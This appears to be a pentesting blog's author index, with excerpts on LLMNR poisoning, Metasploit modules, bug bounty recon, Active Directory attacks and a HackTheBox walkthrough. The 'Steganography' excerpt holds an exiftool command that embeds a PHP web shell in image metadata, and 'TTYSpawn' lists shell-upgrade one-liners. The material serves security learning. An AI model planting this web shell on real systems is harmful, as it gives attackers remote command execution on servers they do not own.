Table of Contents The Concept LLMNR Related Attacks LLMNR/NBT-NS Poisoning Responder How It Works – The Source Code Initialization packet.py Servers Folder The Main Function LLMNR.py Check By Doing Analyze Network Traffic What If I Turn Off the MDNS Poisoner? Conclusion References This is the first article of my Active Directory Series. I’ll be reading…
Author: 0pr
Inside Metasploit – Write a Simple Exploit Module
Table of Contents The Intention Place to Start The Template Be Creative The Prototype The Real Request Next Steps References The really interesting thing begins right here right now. I am going to dig into metasploit, and try to write a simple metasploit module from scratch. The Intention The intention of doing this is to…
Getting Real With BugBounty – Passive Recon
Table of Contents Disclaimer Passive Recon BuiltWith Shodan.io Censys.io Hunter.io Summary Disclaimer Anything here on my blog, this article, and all the other one, are for education purpose. Any misuse of the information is at your own risk. 声明 此博客任何文章,包括本篇,仅供学习使用。任何滥用信息的行为,作者概不负责。 What Perter Kim (author of THP) suggests is to get your hands dirty. And the…
TheHackerPlayBook I – Section III – The Throw
Table of Contents Web Application Exploitation SQL Injection (SQLi) Crosssite Scripting (XSS) Cross-site Request Forgery (CSRF) Session Token Entropy Fuzzing/Input validation Business Logic Summary Web Application Exploitation First things first, two good resources for webapp pentest. OWASP WebApp Testing Guid The Web Application Hacker’s Handbook SQL Injection (SQLi) TODO Read more about SQL database, how…
TheHackerPlayBook I – Section II – The Drive
Table of Contents General Idea The Mentality Thing The Difference Wthin Responsibility Engagement Time Section II – The Drive – Exploiting Scanner Findings About Payloads DEP and ASLR DEP ASLR Take Aways General Idea This is going to be a notes taking article upon reading the book The Hacker Play Book I. I will stop…
0x0C-HackTheBox-Resolute
Set up 目标机器在 10.10.10.169 Recon Nmap # Nmap 7.80 scan initiated Wed Apr 29 23:11:13 2020 as: nmap -A -T4 -p- -v -oN nmap.txt 10.10.10.169 Increasing send delay for 10.10.10.169 from 0 to 5 due to 60 out of 149 dropped probes since last increase. Increasing send delay for 10.10.10.169 from 5 to 10 due…
解决 Metasploit 启动及使用过程中一直出现警告信息的问题
问题描述 运行 msfconsole,即报如下警告信息: ➜ recon msfconsole /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil 警告信息会在使用过程中一直出现,扰乱阅读。 解决方法 打开 /opt/metasploit/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb 文件,找到 84 行,将 if config =~ SIMPLE_INT" 改成 if…
Steganography
Table of Contens Hide Code in Pictures Hide Code in Pictures exiftool -DocumentName="<h1>TEST<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" <pic.[jpg|jpeg|png|gig]>
ActiveDirectory
Table of Contents Enumeration Overall Information Enum4linux PowerView Module Domain Objects DNS Info System Relationship BloodHound-python SharpHound.ps1 GPP Policy Foothold Asrep Roasting Lateral Movement Pass the Password Pass the Hash Dump NTLM Hashes Dump SAM/LSA Token Impersonation DLL Hijacking Dump NTDS Enumeration Overall Information Enum4linux You have nothing, just want a overview of the system…
TTYSpawn
Table of Contents Bash Python Bash SHELL=/bin/bash script -q /dev/null Python python -c 'import pty;pty.spawn("/bin/bash")'